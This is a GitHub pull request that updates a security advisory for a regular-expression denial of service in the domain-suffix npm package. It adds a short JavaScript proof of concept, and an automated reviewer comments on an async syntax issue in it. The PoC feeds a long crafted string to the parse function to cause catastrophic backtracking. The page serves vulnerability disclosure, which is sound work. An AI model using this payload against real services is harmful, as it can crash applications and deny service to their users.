[GHSA-cqfh-c4c5-c2hg] domain-suffix RegEx Denial of Service #6082
Conversation
There was a problem hiding this comment.
Pull Request Overview
Updates a security advisory (GHSA-cqfh-c4c5-c2hg) for a RegEx Denial of Service vulnerability in the domain-suffix package by adding a proof-of-concept exploit and modifying CVSS scoring.
- Added a JavaScript proof-of-concept demonstrating the RegEx DoS vulnerability
- Removed CVSS v3 scoring and kept only CVSS v4
- Updated the modification timestamp
Tip: Customize your code reviews with copilot-instructions.md. Create the file or learn how to get started.
| ], | ||
| "summary": "domain-suffix RegEx Denial of Service", | ||
| "details": "RegEx Denial of Service in domain-suffix 1.0.8 allows attackers to crash the application via crafted input to the parse function.", | ||
| "details": "RegEx Denial of Service in domain-suffix 1.0.8 allows attackers to crash the application via crafted input to the parse function.\n\n## PoC\n```js\nasync function exploit() {\n const domainsuffix = require(\"domain-suffix\");\n // Crafting a string that will cause excessive backtracking\n const maliciousInput = \"a.\".repeat(10000) + \"b\"; // This will create a long sequence of \"a.\" followed by \"b\"\n const result = await domainsuffix.domainSuffix.parse(maliciousInput);\n}\nawait exploit();\n```", |
There was a problem hiding this comment.
The PoC code uses await domainsuffix.domainSuffix.parse() but then has await exploit() at the top level without proper async context. This will cause a syntax error since top-level await requires module context or an async wrapper function.
| "details": "RegEx Denial of Service in domain-suffix 1.0.8 allows attackers to crash the application via crafted input to the parse function.\n\n## PoC\n```js\nasync function exploit() {\n const domainsuffix = require(\"domain-suffix\");\n // Crafting a string that will cause excessive backtracking\n const maliciousInput = \"a.\".repeat(10000) + \"b\"; // This will create a long sequence of \"a.\" followed by \"b\"\n const result = await domainsuffix.domainSuffix.parse(maliciousInput);\n}\nawait exploit();\n```", | |
| "details": "RegEx Denial of Service in domain-suffix 1.0.8 allows attackers to crash the application via crafted input to the parse function.\n\n## PoC\n```js\nasync function exploit() {\n const domainsuffix = require(\"domain-suffix\");\n // Crafting a string that will cause excessive backtracking\n const maliciousInput = \"a.\".repeat(10000) + \"b\"; // This will create a long sequence of \"a.\" followed by \"b\"\n const result = await domainsuffix.domainSuffix.parse(maliciousInput);\n}\n(async () => { await exploit(); })();\n```", |
Copilot uses AI. Check for mistakes.
github-actions
bot
changed the base branch from
main
to
dsimk/advisory-improvement-6082
advisory-database
bot
merged commit db025f7
into
dsimk/advisory-improvement-6082
|
Hi @dsimk! Thank you so much for contributing to the GitHub Advisory Database. This database is free, open, and accessible to all, and it's people like you who make it great. Thanks for choosing to help others. We hope you send in more contributions in the future! |
Updates
Comments
add poc